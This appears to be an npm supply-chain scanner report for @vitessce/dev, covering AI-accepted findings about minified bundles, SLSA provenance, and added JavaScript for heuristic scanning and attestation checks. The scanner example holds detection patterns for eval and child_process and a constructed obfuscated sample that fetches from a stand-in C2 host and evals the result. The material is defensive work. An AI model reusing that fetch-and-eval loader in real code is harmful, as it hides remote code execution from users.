
@vitessce/dev

This package is the main `vitessce` package on NPM. It re-exports the `<Vitessce/>` component from `@vitessce/all` for backwards compatibility.

Versions: 3
License: MIT
Install scripts: No
Provenance: Verified

Supply chain provenance

Status for the latest visible version:
- SLSA provenance attestation
- npm registry signatures
- No source commit

Maintainers

keller-mark

Accepted risks

Findings the reviewer chose to accept rather than block on.

Source | Rule | Reason | Accepted by | When
source-diff | net-exec-file:dist/ReactNeuroglancer-DvvZ7TpP.js | AI (source-diff): Neuroglancer React wrapper bundle; network calls are for neuroscience data fetching, expected. | ai |
source-diff | obfuscated-file:dist/index-BopFrQ1h.js | AI (source-diff): Minified 3D volume rendering code; legitimate bundler output. | ai |
source-diff | obfuscated-file:dist/lerc-CixLzOtk.js | AI (source-diff): LERC raster decoder library, minified; Esri Apache-licensed code, not malicious. | ai |
source-diff | obfuscated-file:dist/higlass-BNRNwGCm.js | AI (source-diff): Standard Vite-minified bundle for HiGlass visualization library; not malicious obfuscation. | ai |
source-diff | net-exec-file:dist/higlass-BNRNwGCm.js | AI (source-diff): Network calls and dynamic code in bundled HiGlass visualization code; expected for this package. | ai |
source-diff | obfuscated-file:dist/index-B31N-uNr.js | AI (source-diff): Standard Vite-minified main bundle; bundler boilerplate, not malicious. | ai |
source-diff | net-exec-file:dist/index-B31N-uNr.js | AI (source-diff): Network + dynamic code in main visualization bundle; expected for vitessce. | ai |
bogus-package | bogus-package | AI (bogus-package): Monorepo sub-package; sparse README and no keywords are expected for internal tooling packages. | ai |
typosquat | typosquat.levenshtein:ajv | AI (typosquat): Scoped @vitessce/* monorepo package; Levenshtein match to 'ajv' is coincidental, not a typosquat. | ai |

Versions (showing 3 of 3)

Version | Deps | Published
3.9.9 | 4 / 4 |
3.9.8 | 4 / 4 |
3.9.7 | 4 / 4 |

v3.9.9

8 findings
HIGH New obfuscated file: dist/higlass-BNRNwGCm.js source-diff

Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.

HIGH New file with network + code execution: dist/higlass-BNRNwGCm.js source-diff

Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.

HIGH New obfuscated file: dist/index-B31N-uNr.js source-diff

Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.

HIGH New file with network + code execution: dist/index-B31N-uNr.js source-diff

Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.

HIGH New obfuscated file: dist/index-BopFrQ1h.js source-diff

Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.

HIGH New obfuscated file: dist/lerc-CixLzOtk.js source-diff

Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.

HIGH New file with network + code execution: dist/ReactNeuroglancer-DvvZ7TpP.js source-diff

Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
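The two source-diff rules above (an "obfuscated file" is any file with a line over 3000 characters; a "network + code execution" file is one that contains both network calls and dynamic code) are cheap heuristics that fire on every Vite-minified `dist/` bundle, which is why each of the v3.9.9 findings was accepted. The following is an added example, not the scanner's or the vitessce project's code: it re-creates those two rules over constructed sample files and adds the triage signal a reviewer actually needs, namely whether the file carries fingerprints of deliberate obfuscation (javascript-obfuscator style `_0x…` identifiers and runs of hex-escaped strings) or only the long lines any bundler emits. The thresholds, pattern lists, file names and sample contents are assumptions for illustration.

```javascript
// Added example; not the scanner's own code. Re-creates the page's two
// source-diff rules and adds an obfuscator-fingerprint triage signal.
// Pattern lists, the 3000-char threshold usage and both sample files are
// assumptions for illustration, not the real tool's configuration.
const LONG_LINE_CHARS = 3000; // threshold quoted in the page's findings

// Indicators of outbound network activity (assumed, not the tool's list).
const NET_PATTERNS = [
  /\bfetch\s*\(/, /\bXMLHttpRequest\b/, /\bWebSocket\s*\(/,
  /\bhttps?\.(?:request|get)\s*\(/, /\bsendBeacon\s*\(/,
];
// Indicators of dynamic code execution (assumed list).
const EXEC_PATTERNS = [
  /\beval\s*\(/, /\bnew\s+Function\s*\(/, /\bimport\s*\(/,
  /\bvm\.run\w*\s*\(/, /\bchild_process\b/,
];
// Fingerprints of javascript-obfuscator style output rather than plain
// minification: _0xabcd identifiers and runs of 4+ hex-escaped characters.
const OBFUSCATOR_PATTERNS = [
  /\b_0x[0-9a-f]{4,}\b/g,
  /(?:\\x[0-9a-f]{2}){4,}/g,
];

const hasAny = (text, patterns) => patterns.some((re) => re.test(text));
const countAll = (text, patterns) =>
  patterns.reduce((n, re) => n + (text.match(re) || []).length, 0);

// Returns the rule names that fire for one file plus the triage signal.
function scanFile(name, text) {
  const longestLine = text.split('\n').reduce((m, l) => Math.max(m, l.length), 0);
  const findings = [];
  if (longestLine > LONG_LINE_CHARS) findings.push(`obfuscated-file:${name}`);
  if (hasAny(text, NET_PATTERNS) && hasAny(text, EXEC_PATTERNS)) {
    findings.push(`net-exec-file:${name}`);
  }
  const obfuscatorHits = countAll(text, OBFUSCATOR_PATTERNS);
  return { name, findings, longestLine, obfuscatorHits };
}

// What a reviewer does with the result: long lines and network+exec in a
// dist/ bundle are expected and are verified against the attested source;
// obfuscator fingerprints are never bundler output and are escalated.
function triage(result) {
  if (result.obfuscatorHits > 0) return 'escalate: obfuscator fingerprints present';
  if (result.findings.length > 0) return 'verify: rebuild from attested source commit and diff dist/';
  return 'clear';
}

// ---- constructed sample files (not real package contents) ----
// (a) A Vite-minified bundle: one very long line that happens to contain
//     fetch() and new Function(), as lazy-loading bundler output does.
const MINIFIED_BUNDLE =
  '"use strict";' + 'var a=1;'.repeat(400) +
  'fetch("https://example.org/data.json").then(r=>r.json());' +
  'var g=new Function("return this")();';
// (b) Real obfuscation: the calls to fetch and eval are hidden behind
//     hex-escaped strings, so the plain net/exec patterns miss them entirely,
//     but the fingerprints fire.
const OBFUSCATED_FILE = [
  'const _0x4f2a=["\\x66\\x65\\x74\\x63\\x68","\\x65\\x76\\x61\\x6c"];',
  'function _0x1b3c(){return window[_0x4f2a[0]]("https://example.org/c2");}',
  'window[_0x4f2a[1]](_0x1b3c());',
].join('\n');

function scanSamples() {
  return [
    scanFile('dist/index-B31N-uNr.js', MINIFIED_BUNDLE),
    scanFile('dist/loader.js', OBFUSCATED_FILE),
  ];
}
```

Run `scanSamples()` and both files tell the story of this page: the minified bundle trips both rules yet has zero obfuscator hits (triage "verify"), while the hidden-call file trips neither rule and is caught only by the fingerprints (triage "escalate"). The "verify" path is the check that matters for a package with SLSA provenance: rebuild `dist/` from the attested source commit and diff it against the published tarball, which the "No source commit" status on this page makes impossible to do mechanically.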

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
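The "SLSA provenance attestation" and "No source commit" statuses under Supply chain provenance, and this finding, are all derived from one object: the in-toto statement inside the Sigstore DSSE bundle that `npm publish --provenance` uploads. The following is an added example, not the registry's, the scanner's or the vitessce project's code: it decodes that statement, checks the SLSA provenance v1 predicate, confirms the subject digest equals the integrity a lockfile pins, and reports whether the build is pinned to a source commit. Field paths follow the in-toto v1, SLSA v1 and Sigstore bundle formats; the bundles, the purl, the digest and the commit are constructed sample values.

```javascript
// Added example; not the registry's or the scanner's own code. Decodes an
// in-toto statement from a Sigstore DSSE bundle and derives the statuses
// shown on this page. All sample values below are constructed, not real.
const IN_TOTO_V1 = 'https://in-toto.io/Statement/v1';
const SLSA_V1 = 'https://slsa.dev/provenance/v1';

// Sigstore bundles carry the statement as a base64 DSSE payload.
function decodeDssePayload(bundle) {
  const env = bundle.dsseEnvelope;
  if (!env || env.payloadType !== 'application/vnd.in-toto+json') {
    throw new Error('bundle does not carry an in-toto DSSE envelope');
  }
  return JSON.parse(Buffer.from(env.payload, 'base64').toString('utf8'));
}

// package-lock.json stores "sha512-<base64>"; attestation subjects use hex.
function integrityToHex(integrity) {
  const dash = integrity.indexOf('-');
  return {
    alg: integrity.slice(0, dash),
    hex: Buffer.from(integrity.slice(dash + 1), 'base64').toString('hex'),
  };
}

// purl is the subject name npm uses, e.g. "pkg:npm/%40vitessce/dev@3.9.9"
// (assumed form; compare against the real subject name in the bundle).
function summarizeProvenance(statement, purl, integrity) {
  const problems = [];
  if (statement._type !== IN_TOTO_V1) problems.push(`unexpected statement type: ${statement._type}`);
  if (statement.predicateType !== SLSA_V1) problems.push(`predicate is ${statement.predicateType}, not SLSA v1`);

  // 1. The subject must be this exact package version with a digest equal to
  //    what the lockfile pins; otherwise the attestation is about something else.
  const subject = (statement.subject || []).find((s) => s.name === purl);
  const want = integrityToHex(integrity);
  const digestMatches = Boolean(subject && subject.digest && subject.digest[want.alg] === want.hex);
  if (!subject) problems.push(`no subject named ${purl}`);
  else if (!digestMatches) problems.push('subject digest does not match lockfile integrity');

  // 2. Builder identity and the source revision the build claims to have used.
  const pred = statement.predicate || {};
  const builderId = pred.runDetails?.builder?.id ?? null;
  const deps = pred.buildDefinition?.resolvedDependencies ?? [];
  const source = deps.find((d) => typeof d.uri === 'string' && d.uri.startsWith('git+'));
  const sourceCommit = source?.digest?.gitCommit ?? null;
  if (!builderId) problems.push('no builder id');
  if (!sourceCommit) problems.push('no source commit: build is not pinned to a repository revision');

  return {
    hasSlsaProvenance: statement.predicateType === SLSA_V1,
    digestMatches, builderId, sourceUri: source?.uri ?? null, sourceCommit, problems,
  };
}

// ---- constructed sample data (not fetched from the registry) ----
const SAMPLE_PURL = 'pkg:npm/%40vitessce/dev@3.9.9';
const SAMPLE_HEX = 'ab'.repeat(64); // stand-in for a real sha512 tarball digest
const SAMPLE_INTEGRITY = 'sha512-' + Buffer.from(SAMPLE_HEX, 'hex').toString('base64');

function makeStatement(withCommit) {
  return {
    _type: IN_TOTO_V1,
    predicateType: SLSA_V1,
    subject: [{ name: SAMPLE_PURL, digest: { sha512: SAMPLE_HEX } }],
    predicate: {
      buildDefinition: {
        buildType: 'https://slsa-framework.github.io/github-actions-buildtypes/workflow/v1',
        resolvedDependencies: [{
          uri: 'git+https://github.com/example/vitessce@refs/heads/main',
          ...(withCommit ? { digest: { gitCommit: 'a'.repeat(40) } } : {}),
        }],
      },
      runDetails: { builder: { id: 'https://github.com/actions/runner/github-hosted' } },
    },
  };
}

function makeBundle(statement) {
  return {
    mediaType: 'application/vnd.dev.sigstore.bundle+json;version=0.2',
    dsseEnvelope: {
      payloadType: 'application/vnd.in-toto+json',
      payload: Buffer.from(JSON.stringify(statement)).toString('base64'),
      signatures: [{ sig: '' }], // signature omitted: this example does not verify it
    },
  };
}

// withCommit=true reproduces a fully pinned build; false reproduces the
// "No source commit" status shown on this page.
function checkSample(withCommit, integrity = SAMPLE_INTEGRITY) {
  const statement = decodeDssePayload(makeBundle(makeStatement(withCommit)));
  return summarizeProvenance(statement, SAMPLE_PURL, integrity);
}
```

This inspects the decoded payload only; it does not verify the DSSE signature, the Fulcio certificate or Rekor inclusion, which is what `npm audit signatures` does for installed packages and what `npm view @vitessce/dev dist.attestations` points at. The "predicate is SLSA v1" signal this page calls the strongest integrity signal is only as strong as the three checks above together: without a subject digest match the attestation is not about the tarball you installed, and without a source commit you cannot rebuild `dist/` to confirm the minified bundles flagged under v3.9.9 are what the attested workflow produced.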

v3.9.8

1 finding
INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v3.9.7

1 finding
INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.